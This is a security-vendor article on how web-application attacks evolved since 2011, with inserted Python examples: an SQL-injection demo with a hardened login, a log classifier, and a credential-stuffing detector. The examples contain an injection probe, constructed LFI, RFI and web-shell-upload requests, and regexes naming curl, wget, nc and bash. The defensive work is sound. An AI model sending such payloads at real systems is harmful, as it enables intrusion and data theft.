what has changed since 2011

The BI.ZONE WAF Cyber Threat Analytics and Research Department studied the statistics of attacks on web applications protected by our solution and compared them with the results of our analysis of shadow (underground) resources, which our specialists have been monitoring since 2011. In this article we describe how attackers' methods have evolved.

How web resources were hacked in past years

Between 2011 and 2018, attackers sold access to hacked web applications on shadow forums. In 90% of cases the targets were content management systems (CMS), CRM systems, and the web administration panels of servers and network equipment exposed to the internet.

To find targets, the attacker took a list of domain names registered over the past year. Such a list is easy to compile from open data, and crawler utilities such as CMS-Finder could then detect the URI of the web admin panel, the template engines in use, the versions of web interpreters, and so on.

The result was a list of potentially vulnerable web resources. At the next stage this list was fed to harvester utilities, which automatically brute-forced admin panel logins and passwords and uploaded web shells (often WSO) to the application servers. If application or interpreter versions with known vulnerabilities were found, off-the-shelf exploits could be used as well.

Attackers also used fuzzer utilities such as WebCruiser, SQLmap, XSSer and RouterSploit, which sent hundreds of payloads covering different web attacks to application servers on the chance that one of them would succeed.

As a result, the attacker gained persistent remote access to the compromised resource. The method was fast, and the utilities could be run in several threads, from different devices and different networks, so in one day it was possible to plant 30–200 web shells on hacked sites and servers.

How did the attackers manage the access they received?

To list all the ways in which such access can be misused would require several separate articles. Let's look at the most popular scenarios from 2011 to 2018:

  1. Once inside the infrastructure, the attacker first tried to understand where he was: he looked at configuration files, available rights, and data about the system and its network interactions. Corporate networks were mostly flat, without segmentation, and servers were located in the local infrastructure, so an attacker could scan the infrastructure from the local network and use some popular exploit to attack via SMB or RDP. In effect he built a map of the environment and moved along it. If the compromised server sat on the company's local network, the attacker would scan network segments to extend the attack to other devices and applications, or try to escape the container or virtual machine. If successful, he could expand his presence in the infrastructure, gain a foothold and, for example, create accounts with administrator rights.

  2. One of the most common cases was database theft. Fuzzer utilities could find SQL injection points on authentication pages, search forms and the like: union-based, boolean-based, time-based, or even stacked queries. Even without special knowledge of SQL syntax, an attacker could detect the vulnerability and automatically dump the data for subsequent sale. At the time many companies stored passwords in clear text directly in the database, so attackers obtained the entire set of credentials, emails and nicknames, which could then be used for credential stuffing or brute-force attacks.

  3. When a stored XSS vulnerability was discovered, attacks on users became possible. For example, attackers actively used the BeEF framework, a legitimate pentesting tool that, in the wrong hands, let them inject a malicious JavaScript library into a compromised page, after which visitors to the site gave the attackers access to their data. This technique only fully worked against vulnerable browser versions, though, and closing the tab with the hacked site broke the connection.

    This is exactly how the SPRUT group acted in 2015. The attackers wrote their own crawler with a fuzzer that searched for and tested web applications for stored XSS vulnerabilities or RCE capabilities at the site file editing level. BeEF was used to generate a JavaScript payload that SPRUT injected into the web application pages.

    To keep the attack from being interrupted when the victim closed the page, the attackers wrote a malicious plugin for several browsers and showed a notification asking the user to install the add-on. If the user did not understand what was happening and simply clicked the familiar “OK”, the malicious JS library stayed resident in the browser, letting the attackers keep the connection alive.

    In this way, SPRUT was able to infect more than 100,000 devices and combine them into a web botnet to steal and sell user data.

  4. Another way to spread malware was to replace objects of a compromised web application so that, on accessing them, the victim received a malicious file on their device. This is exactly how the well-known Zeus botnet and the Carberp banking trojan, which carried a bootkit, operated.

  5. An attacker could use ransomware to encrypt sensitive web application data and demand a ransom from the owner. Alternatively, rather than deploying the ransomware himself, he could again put access to the vulnerable infrastructure up for sale.

  6. Access to the server made it possible to embed a miner script in web pages so that visitors mined cryptocurrency for the attacker. In some cases the miner also ran on the main web application server itself.

  7. If a cybercriminal managed to create several web shells, they could be combined into a botnet using utilities like Web Shell Manager. Subsequently, such botnets were used to provide DDoS services or were sold on shadow resources, where they were purchased, for example, by the owners of larger botnets that needed replenishment.

  8. Hacktivists, who are not after money, often used the access they gained to deface the hacked resource (replace the original content with an ad, message, picture, or similar). Such attackers were mostly after reputation and tried to imitate movie hackers.
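The database-theft scenario in item 2 rests on two defects: query text assembled from user input, and passwords stored in clear text. The following Python example, added here and not taken from the article, shows both defects beside their fixes on an in-memory SQLite database. The table names, the user record, the iteration count and the inputs are constructed for the demo.

```python
"""Added example (not from the BI.ZONE article): a login routine vulnerable to
boolean-based SQL injection and storing clear-text passwords, beside a hardened
version that uses parameterized queries and PBKDF2 password hashing."""
import hashlib
import hmac
import os
import sqlite3

# PBKDF2-HMAC-SHA256 work factor; the value is an assumption for the demo,
# chosen to match commonly published guidance rather than a benchmark.
ITERATIONS = 600_000


def hash_password(password: str, salt: bytes = None) -> str:
    """Return 'salt$digest' (hex) with a random 16-byte salt."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt; compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), ITERATIONS
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


def build_db() -> sqlite3.Connection:
    """Constructed schema: a legacy table with clear-text passwords and a
    hardened table holding only salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users_legacy (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users_legacy VALUES ('alice', 'S3cret!')")
    conn.execute("INSERT INTO users VALUES ('alice', ?)", (hash_password("S3cret!"),))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The query text is built from user input, so a quote in either field is
    # parsed as SQL and can change the WHERE logic instead of being compared
    # as data. A dump of users_legacy would also hand over every password.
    query = (
        "SELECT 1 FROM users_legacy "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders keep the input as a bound value; it never reaches the SQL
    # parser. The table holds only salted hashes, so a dump does not yield
    # reusable credentials for credential stuffing.
    row = conn.execute(
        "SELECT password_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row is not None and verify_password(password, row[0])


if __name__ == "__main__":
    db = build_db()
    probe = "' OR '1'='1"  # classic boolean-based test string from the text
    print("vulnerable, correct password:", login_vulnerable(db, "alice", "S3cret!"))
    print("vulnerable, injected input:  ", login_vulnerable(db, "alice", probe))
    print("hardened, correct password:  ", login_hardened(db, "alice", "S3cret!"))
    print("hardened, injected input:    ", login_hardened(db, "alice", probe))
```

The two points to take from the run: the same boolean-based input that bypasses the string-built query is simply a wrong password for the parameterized one, and even if the hardened `users` table were dumped, the attacker would get salted PBKDF2 hashes rather than the clear-text credentials that fed the credential-stuffing market described above.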

What has changed in recent years

In 2024, more organizations and individual website owners host their web applications with hosting providers. Even if an attacker penetrates the web application, he will not be able to carry the attack over into the company's internal infrastructure.

In addition, the architecture of web applications has changed noticeably. First, it has shifted from monolithic to microservice, and compromising one module does not always lead to compromise of the whole system. Second, request routing, which used to be file-based, is now handled by frameworks. Third, companies that do not need complex web resources now use single-page application (SPA) “business card” sites. Such sites have practically no backend: there is nothing for attackers to break.

Now attackers are less likely to find a vulnerable server with an outdated CMS or an open port. Scanning attempts run into WAFs and isolated segments, and getting into the internal infrastructure is incomparably harder than before. As a result, the old model – hack a host, gain a foothold, sell access – has lost its relevance.

What are the attackers' goals now?

In contrast to the attackers of earlier years, today's cybercriminals try to leave a compromised server as quickly as possible. Their behavior model is “break in, dump the data, leave.” In rare cases groups try to push further from the application into the infrastructure and gain a foothold. As mentioned above, most current web systems are hosted in isolated segments and on external hosting, so it is unclear whether trying to break out of those segments makes any practical sense.

That is why hackers try to download the data quickly and disappear, rather than risk being detected and losing access prematurely. The stolen data is then put up for sale, or published if the motive is hacktivism or politics. For example, databases of password hashes are sold on shadow forums – the hashes can be cracked and the passwords then used for credential stuffing. This attack is very popular because users often reuse the same passwords on different resources: once one site leaks, accounts on other sites are at risk.

Besides data theft, a hacked website can be used as hosting. Malware is placed on compromised resources for later use, for example in phishing campaigns. Such activity is easier to hide from security systems: it is one thing when a user downloads an unknown file from a known domain, and quite another when he connects to some random host.

What methods are used in modern attacks?

Indeed, as we see from the statistics of cyber attacks on BI.ZONE WAF clients, more than half of malicious actions against web resources are attempts to exploit a remote code or command execution (RCE) vulnerability. RCE is popular because it lets the attacker quickly gain remote access to the server and establish full control over it, opening the way to almost any further attack.

According to data from our own honeypots, the web attack techniques now popular among attackers are command injection, server-side template injection (SSTI), stacked-query SQL injection, remote file inclusion (RFI), local file inclusion (LFI), web shell file upload, code injection, XML external entity (XXE), insecure deserialization, and cross-site scripting (XSS). All of them except the last can lead to RCE. Finally, attempts to use exploits for well-known CVEs remain relevant.
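To make the technique list above concrete from the defender's side, here is a small Python classifier, added as an example (it is not BI.ZONE WAF logic and not from the article), that parses access-log lines in the common log format and tags each request target by the injection family it resembles. The signatures are deliberately coarse and the log lines are constructed; XXE and insecure deserialization are left out because their payloads travel in request bodies, which an access log does not record.

```python
"""Added example (not from the article): coarse signature-based triage of
web requests by injection family, run over constructed access-log lines."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed log lines in common log format; the addresses are RFC 5737
# documentation ranges, not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:10:01:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 512
203.0.113.5 - - [10/Mar/2024:10:01:03 +0000] "GET /index.php?page=http://198.51.100.7/x.txt HTTP/1.1" 200 88
198.51.100.9 - - [10/Mar/2024:10:02:10 +0000] "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 1400
198.51.100.9 - - [10/Mar/2024:10:02:11 +0000] "GET /ping?host=127.0.0.1%3Bid HTTP/1.1" 500 0
192.0.2.44 - - [10/Mar/2024:10:03:00 +0000] "POST /upload?name=shell.php HTTP/1.1" 403 0
192.0.2.44 - - [10/Mar/2024:10:03:05 +0000] "GET /index.php?page=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 512
192.0.2.44 - - [10/Mar/2024:10:03:09 +0000] "GET /products?id=42 HTTP/1.1" 200 3100
198.51.100.9 - - [10/Mar/2024:10:04:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# (name, scope, pattern): scope "url" checks path+query, "query" only the
# query string, so a legitimate /index.php path is not flagged as an upload.
RULES = [
    ("lfi", "url", re.compile(r"(\.\./|\.\.\\|/etc/passwd|/proc/self)", re.I)),
    ("rfi", "query", re.compile(r"=(https?|ftp|php|data):", re.I)),
    ("ssti", "url", re.compile(r"(\{\{.*\}\}|\$\{.*\}|<%.*%>)")),
    ("cmdi", "query", re.compile(
        r"(?:[;|`]|&&)\s*(?:id|ls|cat|whoami|uname|wget|curl|sh|bash|ping|nc|echo)\b", re.I)),
    ("webshell_upload", "query", re.compile(r"\.(?:php\d?|phtml|jsp|aspx?)\b", re.I)),
]


def classify(request_target: str) -> list:
    """Return the rule names matching one request target.

    The target is URL-decoded twice because double encoding is a common way
    to slip past a single-decode filter; the second pass is a no-op on
    already-plain text."""
    target = unquote_plus(unquote_plus(request_target))
    _path, _, query = target.partition("?")
    hits = []
    for name, scope, pattern in RULES:
        haystack = target if scope == "url" else query
        if pattern.search(haystack):
            hits.append(name)
    return hits


def parse_line(line: str):
    """Parse one common-log-format line into a dict, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(text: str) -> list:
    """Return (ip, target, hits) for every line that matches at least one rule."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec["target"])
        if hits:
            findings.append((rec["ip"], rec["target"], hits))
    return findings


def per_source_counts(findings: list) -> Counter:
    """Aggregate hits per (source IP, rule) to spot a scanner cycling through families."""
    counts = Counter()
    for ip, _target, hits in findings:
        for name in hits:
            counts[(ip, name)] += 1
    return counts


if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(f"{ip:14} {','.join(hits):16} {target}")
    print(per_source_counts(scan_log(SAMPLE_LOG)))
```

A single tagged request is a weak signal on its own; the aggregation in `per_source_counts` is what turns the list into something actionable, since the scanners named in the next paragraph cycle through these families against one host in quick succession. Real detection would also normalize paths, inspect bodies for the families omitted here, and weigh the signatures against the application's own URL scheme to keep false positives down.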

The popularity of these methods is directly related to the fact that many powerful EASM (external attack surface management) tools have become publicly available for free. They are designed for continuous penetration testing and essentially do the work of a junior pentester: fuzzing and scanning web applications and network ports, identifying vulnerabilities and applying exploits. The most popular utilities are Acunetix, Netsparker, Nessus, Nuclei, Nmap (with NSE scripts), Metasploit Pro, Exploit Pack Premium and Burp Suite Enterprise.

Now, to carry out an attack, an attacker only needs to “feed” the tool a list of target hosts and calmly go and drink tea while the utility finds and exploits the vulnerabilities itself. Many major cyber attacks of recent times (we will not specify which) began with banal credential stuffing or brute force.
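Since the article notes that credential stuffing and brute force still open many major attacks, here is an added Python example (not from the article) of the detection a defender can run over authentication logs: a sliding-window count of failed logins per source address, split into credential stuffing (many distinct usernames, one try each) and brute force (one username, many tries). The event data is constructed and the window, threshold and distinct-user ratio are assumptions to tune per application.

```python
"""Added example (not from the article): per-source sliding-window detection
of credential stuffing versus brute force in constructed authentication events."""
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts ip user outcome")

# Assumed tuning values for the demo.
WINDOW = timedelta(minutes=5)   # look-back per source address
MIN_FAILS = 10                  # failures inside the window that raise an alert
STUFFING_RATIO = 0.8            # share of distinct usernames that marks stuffing


def build_sample() -> str:
    """Constructed event log: '<iso-timestamp> <ip> <username> <FAIL|OK>' per line."""
    base = datetime(2024, 3, 10, 10, 0, 0)
    lines = []
    # Credential stuffing: one source tries 12 different leaked usernames once each.
    for i in range(12):
        ts = base + timedelta(seconds=5 * i)
        lines.append(f"{ts.isoformat()} 203.0.113.5 user{i:02d} FAIL")
    # Brute force: another source hammers a single account.
    for i in range(12):
        ts = base + timedelta(minutes=5, seconds=3 * i)
        lines.append(f"{ts.isoformat()} 198.51.100.9 admin FAIL")
    # A legitimate user who mistypes once and then succeeds.
    lines.append(f"{(base + timedelta(minutes=9)).isoformat()} 192.0.2.44 carol FAIL")
    lines.append(f"{(base + timedelta(minutes=9, seconds=20)).isoformat()} 192.0.2.44 carol OK")
    return "\n".join(lines)


def parse_events(text: str) -> list:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, outcome = line.split()
        events.append(Event(datetime.fromisoformat(ts), ip, user, outcome))
    return events


def detect(events: list, window=WINDOW, min_fails=MIN_FAILS, ratio=STUFFING_RATIO) -> list:
    """Return (ip, kind, failures_in_window, distinct_users) for each source
    whose failed logins reach min_fails inside any window-length span.

    Only the first window that crosses the threshold is reported per source,
    which is what an alerting rule (as opposed to a report) normally wants."""
    fails_by_ip = defaultdict(list)
    for e in events:
        if e.outcome == "FAIL":
            fails_by_ip[e.ip].append(e)

    alerts = []
    for ip, fails in fails_by_ip.items():
        fails.sort(key=lambda e: e.ts)
        start = 0
        for end in range(len(fails)):
            # Advance the window's left edge until it spans at most `window`.
            while fails[end].ts - fails[start].ts > window:
                start += 1
            span = fails[start:end + 1]
            if len(span) >= min_fails:
                users = {e.user for e in span}
                kind = "credential_stuffing" if len(users) >= ratio * len(span) else "brute_force"
                alerts.append((ip, kind, len(span), len(users)))
                break
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(build_sample())):
        print(alert)
```

The per-source view catches the noisy case the article describes, where one tool is pointed at a host list. The caveat a practitioner would add: stuffing campaigns that rotate through many addresses keep every source under `MIN_FAILS`, so the same windowing should also run per username (many sources, one account, i.e. password spraying) and, for reused passwords, on the rate of failures across the whole login endpoint rather than any single key.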

Conclusion

In 2024, 87% of cyber attacks are aimed not at unauthorized access as such but at information: databases, confidential files, authorization data (email addresses, logins, passwords, full names), and materials from corporate and government systems.

Even though some techniques for attacking web applications remain relevant, the attackers' goals have changed radically. Our study of activity on shadow forums shows that only 2 out of 10 offers concern the sale of access via web shells. The rest aim to make money on data that can later be used for phishing, credential stuffing, brute force and similar attacks. Selling remote access for long-term persistence on a web application server has lost its point.
